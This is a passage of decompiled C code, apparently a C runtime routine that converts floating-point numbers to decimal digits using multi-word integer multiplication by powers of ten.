                    													_t1085 = _t1084 - _t983;
                    													_v1888 = _t983;
                    													_t1228 = _t982 >> 5;
                    													_v1876 = _t1228;
                    													_v1908 = _t1085;
                    													_t986 = E013F30E0(1, _t1085, 0);
                    													_v1896 = _v1896 & 0x00000000;
                    													_t987 = _t986 - 1;
                    													__eflags = _t987;
                    													asm("bsr ecx, edi");
                    													_v1884 = _t987;
                    													_v1912 =  !_t987;
                    													if(_t987 == 0) {
                    														_t1086 = 0;
                    														__eflags = 0;
                    													} else {
                    														_t1086 = _t1085 + 1;
                    													}
                    													_t989 = 0x20;
                    													_t990 = _t989 - _t1086;
                    													_t1139 = _t1228 + 2;
                    													__eflags = _v1888 - _t990;
                    													_v1880 = _t1139;
                    													_t991 = _t990 & 0xffffff00 | _v1888 - _t990 > 0x00000000;
                    													__eflags = _t1139 - 0x73;
                    													_v1865 = _t991;
                    													_t1087 = _t1086 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
                    													__eflags = _t1139 - 0x73;
                    													if(_t1139 != 0x73) {
                    														L28:
                    														_t992 = 0;
                    														__eflags = 0;
                    													} else {
                    														__eflags = _t991;
                    														if(_t991 == 0) {
                    															goto L28;
                    														} else {
                    															_t992 = 1;
                    														}
                    													}
                    													__eflags = _t1087;
                    													if(_t1087 != 0) {
                    														L50:
                    														__eflags = 0;
                    														_t1022 = 0x1cc;
                    														_push(0);
                    														_v1400 = 0;
                    														_v472 = 0;
                    														_push( &_v1396);
                    														_push(0x1cc);
                    														_push( &_v468);
                    														L313();
                    														_t1234 =  &(_t1234[4]);
                    													} else {
                    														__eflags = _t992;
                    														if(_t992 != 0) {
                    															goto L50;
                    														} else {
                    															_t1090 = 0x72;
                    															__eflags = _t1139 - _t1090;
                    															if(_t1139 >= _t1090) {
                    																_t1139 = _t1090;
                    																_v1880 = _t1090;
                    															}
                    															_t1091 = _t1139;
                    															_v1892 = _t1091;
                    															__eflags = _t1139 - 0xffffffff;
                    															if(_t1139 != 0xffffffff) {
                    																_t1140 = _v1876;
                    																_t1230 = _t1139 - _t1140;
                    																__eflags = _t1230;
                    																_t1001 =  &_v468 + _t1230 * 4;
                    																_v1872 = _t1001;
                    																while(1) {
                    																	__eflags = _t1091 - _t1140;
                    																	if(_t1091 < _t1140) {
                    																		break;
                    																	}
                    																	__eflags = _t1230 - _t1019;
                    																	if(_t1230 >= _t1019) {
                    																		_t1189 = 0;
                    																		__eflags = 0;
                    																	} else {
                    																		_t1189 =  *_t1001;
                    																	}
                    																	__eflags = _t1230 - 1 - _t1019;
                    																	if(_t1230 - 1 >= _t1019) {
                    																		_t1003 = 0;
                    																		__eflags = 0;
                    																	} else {
                    																		_t1003 =  *(_v1872 - 4);
                    																	}
                    																	_t1096 = _v1892;
                    																	 *(_t1232 + _t1096 * 4 - 0x1d0) = (_t1003 & _v1912) >> _v1908 | (_t1189 & _v1884) << _v1888;
                    																	_t1091 = _t1096 - 1;
                    																	_t1230 = _t1230 - 1;
                    																	_t1001 = _v1872 - 4;
                    																	_v1892 = _t1091;
                    																	_v1872 = _t1001;
                    																	__eflags = _t1091 - 0xffffffff;
                    																	if(_t1091 != 0xffffffff) {
                    																		_t1019 = _v472;
                    																		continue;
                    																	}
                    																	break;
                    																}
                    																_t1139 = _v1880;
                    																_t1228 = _v1876;
                    															}
                    															__eflags = _t1228;
                    															if(_t1228 != 0) {
                    																__eflags = 0;
                    																memset( &_v468, 0, _t1228 << 2);
                    																_t1234 =  &(_t1234[3]);
                    															}
                    															__eflags = _v1865;
                    															_t1022 = 0x1cc;
                    															if(_v1865 == 0) {
                    																_v472 = _t1139;
                    															} else {
                    																_v472 = _t1139 + 1;
                    															}
                    														}
                    													}
                    													_v1392 = _v1392 & 0x00000000;
                    													_t996 = 4;
                    													__eflags = 1;
                    													_v1396 = _t996;
                    													_v1400 = 1;
                    													_v936 = 1;
                    													_push(_t996);
                    												}
                    												goto L52;
                    											}
                    											goto L53;
                    										}
                    										L52:
                    										_push( &_v1396);
                    										_push(_t1022);
                    										_push( &_v932);
                    										L313();
                    										_t1238 =  &(_t1234[4]);
                    									}
                    									_t781 = _v1904;
                    									_t1040 = 0xa;
                    									_v1912 = _t1040;
                    									__eflags = _t781;
                    									if(_t781 < 0) {
                    										_t782 =  ~_t781;
                    										_t783 = _t782 / _t1040;
                    										_v1880 = _t783;
                    										_t1041 = _t782 % _t1040;
                    										_v1884 = _t1041;
                    										__eflags = _t783;
                    										if(_t783 == 0) {
                    											L249:
                    											__eflags = _t1041;
                    											if(_t1041 != 0) {
                    												_t817 =  *(0x1423794 + _t1041 * 4);
                    												_v1896 = _t817;
                    												__eflags = _t817;
                    												if(_t817 == 0) {
                    													L260:
                    													__eflags = 0;
                    													_push(0);
                    													_v472 = 0;
                    													_v2408 = 0;
                    													goto L261;
                    												} else {
                    													__eflags = _t817 - 1;
                    													if(_t817 != 1) {
                    														_t1052 = _v472;
                    														__eflags = _t1052;
                    														if(_t1052 != 0) {
                    															_t1158 = 0;
                    															_t1210 = 0;
                    															__eflags = 0;
                    															do {
                    																_t1110 = _t817 *  *(_t1232 + _t1210 * 4 - 0x1d0) >> 0x20;
                    																 *(_t1232 + _t1210 * 4 - 0x1d0) = _t817 *  *(_t1232 + _t1210 * 4 - 0x1d0) + _t1158;
                    																_t817 = _v1896;
                    																asm("adc edx, 0x0");
                    																_t1210 = _t1210 + 1;
                    																_t1158 = _t1110;
                    																__eflags = _t1210 - _t1052;
                    															} while (_t1210 != _t1052);
                    															__eflags = _t1158;
                    															if(_t1158 != 0) {
                    																_t823 = _v472;
                    																__eflags = _t823 - 0x73;
                    																if(_t823 >= 0x73) {
                    																	goto L260;
                    																} else {
                    																	 *(_t1232 + _t823 * 4 - 0x1d0) = _t1158;
                    																	_v472 = _v472 + 1;
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    										} else {
                    											do {
                    												__eflags = _t783 - 0x26;
                    												if(_t783 > 0x26) {
                    													_t783 = 0x26;
                    												}
                    												_t1053 =  *(0x14236fe + _t783 * 4) & 0x000000ff;
                    												_v1872 = _t783;
                    												_v1400 = ( *(0x14236fe + _t783 * 4) & 0x000000ff) + ( *(0x14236ff + _t783 * 4) & 0x000000ff);
                    												E013F5890(_t1053 << 2,  &_v1396, 0, _t1053 << 2);
                    												_t834 = E013F5310( &(( &_v1396)[_t1053]), 0x1422df8 + ( *(0x14236fc + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x14236ff + _t783 * 4) & 0x000000ff) << 2);
                    												_t1054 = _v1400;
                    												_t1238 =  &(_t1238[6]);
                    												_v1892 = _t1054;
                    												__eflags = _t1054 - 1;
                    												if(_t1054 > 1) {
                    													__eflags = _v472 - 1;
                    													if(_v472 > 1) {
                    														__eflags = _t1054 - _v472;
                    														_t1161 =  &_v1396;
                    														_t835 = _t834 & 0xffffff00 | _t1054 - _v472 > 0x00000000;
                    														__eflags = _t835;
                    														if(_t835 != 0) {
                    															_t1111 =  &_v468;
                    														} else {
                    															_t1161 =  &_v468;
                    															_t1111 =  &_v1396;
                    														}
                    														_v1908 = _t1111;
                    														__eflags = _t835;
                    														if(_t835 == 0) {
                    															_t1054 = _v472;
                    														}
                    														_v1876 = _t1054;
                    														__eflags = _t835;
                    														if(_t835 != 0) {
                    															_v1892 = _v472;
                    														}
                    														_t1112 = 0;
                    														_t1212 = 0;
                    														_v1864 = 0;
                    														__eflags = _t1054;
                    														if(_t1054 == 0) {
                    															L243:
                    															_v472 = _t1112;
                    															_t837 = _t1112 << 2;
                    															__eflags = _t837;
                    															_push(_t837);
                    															_t838 =  &_v1860;
                    															goto L244;
                    														} else {
                    															_t1162 = _t1161 -  &_v1860;
                    															__eflags = _t1162;
                    															_v1928 = _t1162;
                    															do {
                    																_t844 =  *(_t1232 + _t1162 + _t1212 * 4 - 0x740);
                    																_v1896 = _t844;
                    																__eflags = _t844;
                    																if(_t844 != 0) {
                    																	_t845 = 0;
                    																	_t1163 = 0;
                    																	_t1055 = _t1212;
                    																	_v1888 = 0;
                    																	__eflags = _v1892;
                    																	if(_v1892 == 0) {
                    																		L240:
                    																		__eflags = _t1055 - 0x73;
                    																		if(_t1055 == 0x73) {
                    																			goto L258;
                    																		} else {
                    																			_t1162 = _v1928;
                    																			_t1054 = _v1876;
                    																			goto L242;
                    																		}
                    																	} else {
                    																		while(1) {
                    																			__eflags = _t1055 - 0x73;
                    																			if(_t1055 == 0x73) {
                    																				goto L235;
                    																			}
                    																			__eflags = _t1055 - _t1112;
                    																			if(_t1055 == _t1112) {
                    																				 *(_t1232 + _t1055 * 4 - 0x740) =  *(_t1232 + _t1055 * 4 - 0x740) & 0x00000000;
                    																				_t856 = _t845 + 1 + _t1212;
                    																				__eflags = _t856;
                    																				_v1864 = _t856;
                    																				_t845 = _v1888;
                    																			}
                    																			_t851 =  *(_v1908 + _t845 * 4);
                    																			asm("adc edx, 0x0");
                    																			 *(_t1232 + _t1055 * 4 - 0x740) =  *(_t1232 + _t1055 * 4 - 0x740) + _t851 * _v1896 + _t1163;
                    																			asm("adc edx, 0x0");
                    																			_t845 = _v1888 + 1;
                    																			_t1055 = _t1055 + 1;
                    																			_v1888 = _t845;
                    																			_t1163 = _t851 * _v1896 >> 0x20;
                    																			_t1112 = _v1864;
                    																			__eflags = _t845 - _v1892;
                    																			if(_t845 != _v1892) {
                    																				continue;
                    																			} else {
                    																				goto L235;
                    																			}
                    																			while(1) {
                    																				L235:
                    																				__eflags = _t1163;
                    																				if(_t1163 == 0) {
                    																					goto L240;
                    																				}
                    																				__eflags = _t1055 - 0x73;
                    																				if(_t1055 == 0x73) {
                    																					goto L258;
                    																				} else {
                    																					__eflags = _t1055 - _t1112;
                    																					if(_t1055 == _t1112) {
                    																						_t558 = _t1232 + _t1055 * 4 - 0x740;
                    																						 *_t558 =  *(_t1232 + _t1055 * 4 - 0x740) & 0x00000000;
                    																						__eflags =  *_t558;
                    																						_t564 = _t1055 + 1; // 0x1
                    																						_v1864 = _t564;
                    																					}
                    																					_t849 = _t1163;
                    																					_t1163 = 0;
                    																					 *(_t1232 + _t1055 * 4 - 0x740) =  *(_t1232 + _t1055 * 4 - 0x740) + _t849;
                    																					_t1112 = _v1864;
                    																					asm("adc edi, edi");
                    																					_t1055 = _t1055 + 1;
                    																					continue;
                    																				}
                    																				goto L246;
                    																			}
                    																			goto L240;
                    																		}
                    																		goto L235;
                    																	}
                    																} else {
                    																	__eflags = _t1212 - _t1112;
                    																	if(_t1212 == _t1112) {
                    																		 *(_t1232 + _t1212 * 4 - 0x740) =  *(_t1232 + _t1212 * 4 - 0x740) & _t844;
                    																		_t526 = _t1212 + 1; // 0x1
                    																		_t1112 = _t526;
                    																		_v1864 = _t1112;
                    																	}
                    																	goto L242;
                    																}
                    																goto L246;
                    																L242:
                    																_t1212 = _t1212 + 1;
                    																__eflags = _t1212 - _t1054;
                    															} while (_t1212 != _t1054);
                    															goto L243;
                    														}
                    													} else {
                    														_t1164 = _v468;
                    														_push(_t1054 << 2);
                    														_v472 = _t1054;
                    														_push( &_v1396);
                    														_push(_t1022);
                    														_push( &_v468);
                    														L313();
                    														_t1238 =  &(_t1238[4]);
                    														__eflags = _t1164;
                    														if(_t1164 == 0) {
                    															goto L203;
                    														} else {
                    															__eflags = _t1164 - 1;
                    															if(_t1164 == 1) {
                    																goto L245;
                    															} else {
                    																__eflags = _v472;
                    																if(_v472 == 0) {
                    																	goto L245;
                    																} else {
                    																	_t1056 = 0;
                    																	_v1896 = _v472;
                    																	_t1213 = 0;
                    																	__eflags = 0;
                    																	do {
                    																		_t864 = _t1164;
                    																		_t1113 = _t864 *  *(_t1232 + _t1213 * 4 - 0x1d0) >> 0x20;
                    																		 *(_t1232 + _t1213 * 4 - 0x1d0) = _t864 *  *(_t1232 + _t1213 * 4 - 0x1d0) + _t1056;
                    																		asm("adc edx, 0x0");
                    																		_t1213 = _t1213 + 1;
                    																		_t1056 = _t1113;
                    																		__eflags = _t1213 - _v1896;
                    																	} while (_t1213 != _v1896);
                    																	goto L208;
                    																}
                    															}
                    														}
                    													}
                    												} else {
                    													_t1165 = _v1396;
                    													__eflags = _t1165;
                    													if(_t1165 != 0) {
                    														__eflags = _t1165 - 1;
                    														if(_t1165 == 1) {
                    															goto L245;
                    														} else {
                    															__eflags = _v472;
                    															if(_v472 == 0) {
                    																goto L245;
                    															} else {
                    																_t1057 = 0;
                    																_v1896 = _v472;
                    																_t1214 = 0;
                    																__eflags = 0;
                    																do {
                    																	_t869 = _t1165;
                    																	_t1114 = _t869 *  *(_t1232 + _t1214 * 4 - 0x1d0) >> 0x20;
                    																	 *(_t1232 + _t1214 * 4 - 0x1d0) = _t869 *  *(_t1232 + _t1214 * 4 - 0x1d0) + _t1057;
                    																	asm("adc edx, 0x0");
                    																	_t1214 = _t1214 + 1;
                    																	_t1057 = _t1114;
                    																	__eflags = _t1214 - _v1896;
                    																} while (_t1214 != _v1896);
                    																L208:
                    																__eflags = _t1056;
                    																if(_t1056 == 0) {
                    																	goto L245;
                    																} else {
                    																	_t867 = _v472;
                    																	__eflags = _t867 - 0x73;
                    																	if(_t867 >= 0x73) {
                    																		L258:
                    																		_push(0);
                    																		_v2408 = 0;
                    																		_v472 = 0;
                    																		_push( &_v2404);
                    																		_push(_t1022);
                    																		_push( &_v468);
                    																		L313();
                    																		_t1238 =  &(_t1238[4]);
                    																		_t840 = 0;
                    																	} else {
                    																		 *(_t1232 + _t867 * 4 - 0x1d0) = _t1056;
                    																		_v472 = _v472 + 1;
                    																		goto L245;
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														L203:
                    														_v2408 = 0;
                    														_v472 = 0;
                    														_push(0);
                    														_t838 =  &_v2404;
                    														L244:
                    														_push(_t838);
                    														_push(_t1022);
                    														_push( &_v468);
                    														L313();
                    														_t1238 =  &(_t1238[4]);
                    														L245:
                    														_t840 = 1;
                    													}
                    												}
                    												L246:
                    												__eflags = _t840;
                    												if(_t840 == 0) {
                    													_v2408 = _v2408 & 0x00000000;
                    													_v472 = _v472 & 0x00000000;
                    													_push(0);
                    													L261:
                    													_push( &_v2404);
                    													_t820 =  &_v468;
                    													goto L262;
                    												} else {
                    													goto L247;
                    												}
                    												goto L263;
                    												L247:
                    												_t783 = _v1880 - _v1872;
                    												__eflags = _t783;
                    												_v1880 = _t783;
                    											} while (_t783 != 0);
                    											_t1041 = _v1884;
                    											goto L249;
                    										}
                    									} else {
                    										_t872 = _t781 / _t1040;
                    										_v1908 = _t872;
                    										_t1058 = _t781 % _t1040;
                    										_v1896 = _t1058;
                    										__eflags = _t872;
                    										if(_t872 == 0) {
                    											L184:
                    											__eflags = _t1058;
                    											if(_t1058 != 0) {
                    												_t1166 =  *(0x1423794 + _t1058 * 4);
                    												__eflags = _t1166;
                    												if(_t1166 != 0) {
                    													__eflags = _t1166 - 1;
                    													if(_t1166 != 1) {
                    														_t873 = _v936;
                    														_v1896 = _t873;
                    														__eflags = _t873;
                    														if(_t873 != 0) {
                    															_t1215 = 0;
                    															_t1059 = 0;
                    															__eflags = 0;
                    															do {
                    																_t874 = _t1166;
                    																_t1118 = _t874 *  *(_t1232 + _t1059 * 4 - 0x3a0) >> 0x20;
                    																 *(_t1232 + _t1059 * 4 - 0x3a0) = _t874 *  *(_t1232 + _t1059 * 4 - 0x3a0) + _t1215;
                    																asm("adc edx, 0x0");
                    																_t1059 = _t1059 + 1;
                    																_t1215 = _t1118;
                    																__eflags = _t1059 - _v1896;
                    															} while (_t1059 != _v1896);
                    															__eflags = _t1215;
                    															if(_t1215 != 0) {
                    																_t877 = _v936;
                    																__eflags = _t877 - 0x73;
                    																if(_t877 >= 0x73) {
                    																	goto L186;
                    																} else {
                    																	 *(_t1232 + _t877 * 4 - 0x3a0) = _t1215;
                    																	_v936 = _v936 + 1;
                    																}
                    															}
                    														}
                    													}
                    												} else {
                    													L186:
                    													_v2408 = 0;
                    													_v936 = 0;
                    													_push(0);
                    													goto L190;
                    												}
                    											}
                    										} else {
                    											do {
                    												__eflags = _t872 - 0x26;
                    												if(_t872 > 0x26) {
                    													_t872 = 0x26;
                    												}
                    												_t1060 =  *(0x14236fe + _t872 * 4) & 0x000000ff;
                    												_v1888 = _t872;
                    												_v1400 = ( *(0x14236fe + _t872 * 4) & 0x000000ff) + ( *(0x14236ff + _t872 * 4) & 0x000000ff);
                    												E013F5890(_t1060 << 2,  &_v1396, 0, _t1060 << 2);
                    												_t890 = E013F5310( &(( &_v1396)[_t1060]), 0x1422df8 + ( *(0x14236fc + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x14236ff + _t872 * 4) & 0x000000ff) << 2);
                    												_t1061 = _v1400;
                    												_t1238 =  &(_t1238[6]);
                    												_v1892 = _t1061;
                    												__eflags = _t1061 - 1;
                    												if(_t1061 > 1) {
                    													__eflags = _v936 - 1;
                    													if(_v936 > 1) {
                    														__eflags = _t1061 - _v936;
                    														_t1169 =  &_v1396;
                    														_t891 = _t890 & 0xffffff00 | _t1061 - _v936 > 0x00000000;
                    														__eflags = _t891;
                    														if(_t891 != 0) {
                    															_t1119 =  &_v932;
                    														} else {
                    															_t1169 =  &_v932;
                    															_t1119 =  &_v1396;
                    														}
                    														_v1876 = _t1119;
                    														__eflags = _t891;
                    														if(_t891 == 0) {
                    															_t1061 = _v936;
                    														}
                    														_v1880 = _t1061;
                    														__eflags = _t891;
                    														if(_t891 != 0) {
                    															_v1892 = _v936;
                    														}
                    														_t1120 = 0;
                    														_t1217 = 0;
                    														_v1864 = 0;
                    														__eflags = _t1061;
                    														if(_t1061 == 0) {
                    															L177:
                    															_v936 = _t1120;
                    															_t893 = _t1120 << 2;
                    															__eflags = _t893;
                    															goto L178;
                    														} else {
                    															_t1170 = _t1169 -  &_v1860;
                    															__eflags = _t1170;
                    															_v1928 = _t1170;
                    															do {
                    																_t900 =  *(_t1232 + _t1170 + _t1217 * 4 - 0x740);
                    																_v1884 = _t900;
                    																__eflags = _t900;
                    																if(_t900 != 0) {
                    																	_t901 = 0;
                    																	_t1171 = 0;
                    																	_t1062 = _t1217;
                    																	_v1872 = 0;
                    																	__eflags = _v1892;
                    																	if(_v1892 == 0) {
                    																		L174:
                    																		__eflags = _t1062 - 0x73;
                    																		if(_t1062 == 0x73) {
                    																			goto L187;
                    																		} else {
                    																			_t1170 = _v1928;
                    																			_t1061 = _v1880;
                    																			goto L176;
                    																		}
                    																	} else {
                    																		while(1) {
                    																			__eflags = _t1062 - 0x73;
                    																			if(_t1062 == 0x73) {
                    																				goto L169;
                    																			}
                    																			__eflags = _t1062 - _t1120;
                    																			if(_t1062 == _t1120) {
                    																				 *(_t1232 + _t1062 * 4 - 0x740) =  *(_t1232 + _t1062 * 4 - 0x740) & 0x00000000;
                    																				_t912 = _t901 + 1 + _t1217;
                    																				__eflags = _t912;
                    																				_v1864 = _t912;
                    																				_t901 = _v1872;
                    																			}
                    																			_t907 =  *(_v1876 + _t901 * 4);
                    																			asm("adc edx, 0x0");
                    																			 *(_t1232 + _t1062 * 4 - 0x740) =  *(_t1232 + _t1062 * 4 - 0x740) + _t907 * _v1884 + _t1171;
                    																			asm("adc edx, 0x0");
                    																			_t901 = _v1872 + 1;
                    																			_t1062 = _t1062 + 1;
                    																			_v1872 = _t901;
                    																			_t1171 = _t907 * _v1884 >> 0x20;
                    																			_t1120 = _v1864;
                    																			__eflags = _t901 - _v1892;
                    																			if(_t901 != _v1892) {
                    																				continue;
                    																			} else {
                    																				goto L169;
                    																			}
                    																			while(1) {
                    																				L169:
                    																				__eflags = _t1171;
                    																				if(_t1171 == 0) {
                    																					goto L174;
                    																				}
                    																				__eflags = _t1062 - 0x73;
                    																				if(_t1062 == 0x73) {
                    																					L187:
                    																					__eflags = 0;
                    																					_v2408 = 0;
                    																					_v936 = 0;
                    																					_push(0);
                    																					_t903 =  &_v2404;
                    																					goto L188;
                    																				} else {
                    																					__eflags = _t1062 - _t1120;
                    																					if(_t1062 == _t1120) {
                    																						_t370 = _t1232 + _t1062 * 4 - 0x740;
                    																						 *_t370 =  *(_t1232 + _t1062 * 4 - 0x740) & 0x00000000;
                    																						__eflags =  *_t370;
                    																						_t376 = _t1062 + 1; // 0x1
                    																						_v1864 = _t376;
                    																					}
                    																					_t905 = _t1171;
                    																					_t1171 = 0;
                    																					 *(_t1232 + _t1062 * 4 - 0x740) =  *(_t1232 + _t1062 * 4 - 0x740) + _t905;
                    																					_t1120 = _v1864;
                    																					asm("adc edi, edi");
                    																					_t1062 = _t1062 + 1;
                    																					continue;
                    																				}
                    																				goto L181;
                    																			}
                    																			goto L174;
                    																		}
                    																		goto L169;
                    																	}
                    																} else {
                    																	__eflags = _t1217 - _t1120;
                    																	if(_t1217 == _t1120) {
                    																		 *(_t1232 + _t1217 * 4 - 0x740) =  *(_t1232 + _t1217 * 4 - 0x740) & _t900;
                    																		_t338 = _t1217 + 1; // 0x1
                    																		_t1120 = _t338;
                    																		_v1864 = _t1120;
                    																	}
                    																	goto L176;
                    																}
                    																goto L181;
                    																L176:
                    																_t1217 = _t1217 + 1;
                    																__eflags = _t1217 - _t1061;
                    															} while (_t1217 != _t1061);
                    															goto L177;
                    														}
                    													} else {
                    														_t1172 = _v932;
                    														_push(_t1061 << 2);
                    														_v936 = _t1061;
                    														_push( &_v1396);
                    														_push(_t1022);
                    														_push( &_v932);
                    														L313();
                    														_t1238 =  &(_t1238[4]);
                    														__eflags = _t1172;
                    														if(_t1172 != 0) {
                    															__eflags = _t1172 - 1;
                    															if(_t1172 == 1) {
                    																goto L180;
                    															} else {
                    																__eflags = _v936;
                    																if(_v936 == 0) {
                    																	goto L180;
                    																} else {
                    																	_t1063 = 0;
                    																	_v1884 = _v936;
                    																	_t1218 = 0;
                    																	__eflags = 0;
                    																	do {
                    																		_t919 = _t1172;
                    																		_t1121 = _t919 *  *(_t1232 + _t1218 * 4 - 0x3a0) >> 0x20;
                    																		 *(_t1232 + _t1218 * 4 - 0x3a0) = _t919 *  *(_t1232 + _t1218 * 4 - 0x3a0) + _t1063;
                    																		asm("adc edx, 0x0");
                    																		_t1218 = _t1218 + 1;
                    																		_t1063 = _t1121;
                    																		__eflags = _t1218 - _v1884;
                    																	} while (_t1218 != _v1884);
                    																	goto L149;
                    																}
                    															}
                    														} else {
                    															_v1400 = 0;
                    															_v936 = 0;
                    															_push(0);
                    															_t894 =  &_v1396;
                    															goto L179;
                    														}
                    													}
                    												} else {
                    													_t1173 = _v1396;
                    													__eflags = _t1173;
                    													if(_t1173 != 0) {
                    														__eflags = _t1173 - 1;
                    														if(_t1173 == 1) {
                    															goto L180;
                    														} else {
                    															__eflags = _v936;
                    															if(_v936 == 0) {
                    																goto L180;
                    															} else {
                    																_t1064 = 0;
                    																_v1884 = _v936;
                    																_t1219 = 0;
                    																__eflags = 0;
                    																do {
                    																	_t926 = _t1173;
                    																	_t1122 = _t926 *  *(_t1232 + _t1219 * 4 - 0x3a0) >> 0x20;
                    																	 *(_t1232 + _t1219 * 4 - 0x3a0) = _t926 *  *(_t1232 + _t1219 * 4 - 0x3a0) + _t1064;
                    																	asm("adc edx, 0x0");
                    																	_t1219 = _t1219 + 1;
                    																	_t1064 = _t1122;
                    																	__eflags = _t1219 - _v1884;
                    																} while (_t1219 != _v1884);
                    																L149:
                    																__eflags = _t1063;
                    																if(_t1063 == 0) {
                    																	goto L180;
                    																} else {
                    																	_t922 = _v936;
                    																	__eflags = _t922 - 0x73;
                    																	if(_t922 < 0x73) {
                    																		 *(_t1232 + _t922 * 4 - 0x3a0) = _t1063;
                    																		_v936 = _v936 + 1;
                    																		goto L180;
                    																	} else {
                    																		_v1400 = 0;
                    																		_v936 = 0;
                    																		_push(0);
                    																		_t903 =  &_v1396;
                    																		L188:
                    																		_push(_t903);
                    																		_push(_t1022);
                    																		_push( &_v932);
                    																		L313();
                    																		_t1238 =  &(_t1238[4]);
                    																		_t896 = 0;
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t893 = 0;
                    														_v1864 = 0;
                    														_v936 = 0;
                    														L178:
                    														_push(_t893);
                    														_t894 =  &_v1860;
                    														L179:
                    														_push(_t894);
                    														_push(_t1022);
                    														_push( &_v932);
                    														L313();
                    														_t1238 =  &(_t1238[4]);
                    														L180:
                    														_t896 = 1;
                    													}
                    												}
                    												L181:
                    												__eflags = _t896;
                    												if(_t896 == 0) {
                    													_v2408 = _v2408 & 0x00000000;
                    													_t404 =  &_v936;
                    													 *_t404 = _v936 & 0x00000000;
                    													__eflags =  *_t404;
                    													_push(0);
                    													L190:
                    													_push( &_v2404);
                    													_t820 =  &_v932;
                    													L262:
                    													_push(_t1022);
                    													_push(_t820);
                    													L313();
                    													_t1238 =  &(_t1238[4]);
                    												} else {
                    													goto L182;
                    												}
                    												goto L263;
                    												L182:
                    												_t872 = _v1908 - _v1888;
                    												__eflags = _t872;
                    												_v1908 = _t872;
                    											} while (_t872 != 0);
                    											_t1058 = _v1896;
                    											goto L184;
                    										}
                    									}
                    									L263:
                    									_t1153 = _v1920;
                    									_t1205 = _t1153;
                    									_t1042 = _v472;
                    									_v1872 = _t1205;
                    									__eflags = _t1042;
                    									if(_t1042 != 0) {
                    										_t1209 = 0;
                    										_t1157 = 0;
                    										__eflags = 0;
                    										do {
                    											_t810 =  *(_t1232 + _t1157 * 4 - 0x1d0);
                    											_t1108 = 0xa;
                    											_t1109 = _t810 * _t1108 >> 0x20;
                    											 *(_t1232 + _t1157 * 4 - 0x1d0) = _t810 * _t1108 + _t1209;
                    											asm("adc edx, 0x0");
                    											_t1157 = _t1157 + 1;
                    											_t1209 = _t1109;
                    											__eflags = _t1157 - _t1042;
                    										} while (_t1157 != _t1042);
                    										_v1896 = _t1209;
                    										__eflags = _t1209;
                    										_t1205 = _v1872;
                    										if(_t1209 != 0) {
                    											_t1051 = _v472;
                    											__eflags = _t1051 - 0x73;
                    											if(_t1051 >= 0x73) {
                    												__eflags = 0;
                    												_push(0);
                    												_v2408 = 0;
                    												_v472 = 0;
                    												_push( &_v2404);
                    												_push(_t1022);
                    												_push( &_v468);
                    												L313();
                    												_t1238 =  &(_t1238[4]);
                    											} else {
                    												 *(_t1232 + _t1051 * 4 - 0x1d0) = _t1109;
                    												_v472 = _v472 + 1;
                    											}
                    										}
                    										_t1153 = _t1205;
                    									}
                    									_t786 = E01401420( &_v472,  &_v936);
                    									_t1101 = 0xa;
                    									__eflags = _t786 - _t1101;
                    									if(_t786 != _t1101) {
                    										__eflags = _t786;
                    										if(_t786 != 0) {
                    											_t787 = _t786 + 0x30;
                    											__eflags = _t787;
                    											_t1205 = _t1153 + 1;
                    											 *_t1153 = _t787;
                    											_v1872 = _t1205;
                    											goto L282;
                    										} else {
                    											_t788 = _v1904 - 1;
                    										}
                    									} else {
                    										_v1904 = _v1904 + 1;
                    										_t1205 = _t1153 + 1;
                    										_t802 = _v936;
                    										 *_t1153 = 0x31;
                    										_v1872 = _t1205;
                    										__eflags = _t802;
                    										if(_t802 != 0) {
                    											_t1156 = 0;
                    											_t1208 = _t802;
                    											_t1050 = 0;
                    											__eflags = 0;
                    											do {
                    												_t803 =  *(_t1232 + _t1050 * 4 - 0x3a0);
                    												 *(_t1232 + _t1050 * 4 - 0x3a0) = _t803 * _t1101 + _t1156;
                    												asm("adc edx, 0x0");
                    												_t1050 = _t1050 + 1;
                    												_t1156 = _t803 * _t1101 >> 0x20;
                    												_t1101 = 0xa;
                    												__eflags = _t1050 - _t1208;
                    											} while (_t1050 != _t1208);
                    											_t1205 = _v1872;
                    											__eflags = _t1156;
                    											if(_t1156 != 0) {
                    												_t806 = _v936;
                    												__eflags = _t806 - 0x73;
                    												if(_t806 >= 0x73) {
                    													_push(0);
                    													_v2408 = 0;
                    													_v936 = 0;
                    													_push( &_v2404);
                    													_push(_t1022);
                    													_push( &_v932);
                    													L313();
                    													_t1238 =  &(_t1238[4]);
                    												} else {
                    													 *(_t1232 + _t806 * 4 - 0x3a0) = _t1156;
                    													_v936 = _v936 + 1;
                    												}
                    											}
                    										}
                    										L282:
                    										_t788 = _v1904;
                    									}
                    									 *((intOrPtr*)(_v1924 + 4)) = _t788;
                    									_t1028 = _v1916;
                    									__eflags = _t788;
                    									if(_t788 >= 0) {
                    										__eflags = _t1028 - 0x7fffffff;
                    										if(_t1028 <= 0x7fffffff) {
                    											_t1028 = _t1028 + _t788;
                    											__eflags = _t1028;
                    										}
                    									}
                    									_t790 = _a24 - 1;
                    									__eflags = _t790 - _t1028;
                    									if(_t790 >= _t1028) {
                    										_t790 = _t1028;
                    									}
                    									_t737 = _t790 + _v1920;
                    									_v1916 = _t737;
                    									__eflags = _t1205 - _t737;
                    									if(__eflags != 0) {
                    										while(1) {
                    											_t737 = _v472;
                    											__eflags = _t737;
                    											if(__eflags == 0) {
                    												goto L303;
                    											}
                    											_t1154 = 0;
                    											_t1206 = _t737;
                    											_t1046 = 0;
                    											__eflags = 0;
                    											do {
                    												_t791 =  *(_t1232 + _t1046 * 4 - 0x1d0);
                    												 *(_t1232 + _t1046 * 4 - 0x1d0) = _t791 * 0x3b9aca00 + _t1154;
                    												asm("adc edx, 0x0");
                    												_t1046 = _t1046 + 1;
                    												_t1154 = _t791 * 0x3b9aca00 >> 0x20;
                    												__eflags = _t1046 - _t1206;
                    											} while (_t1046 != _t1206);
                    											_t1207 = _v1872;
                    											__eflags = _t1154;
                    											if(_t1154 != 0) {
                    												_t797 = _v472;
                    												__eflags = _t797 - 0x73;
                    												if(_t797 >= 0x73) {
                    													__eflags = 0;
                    													_push(0);
                    													_v2408 = 0;
                    													_v472 = 0;
                    													_push( &_v2404);
                    													_push(_t1022);
                    													_push( &_v468);
                    													L313();
                    													_t1238 =  &(_t1238[4]);
                    												} else {
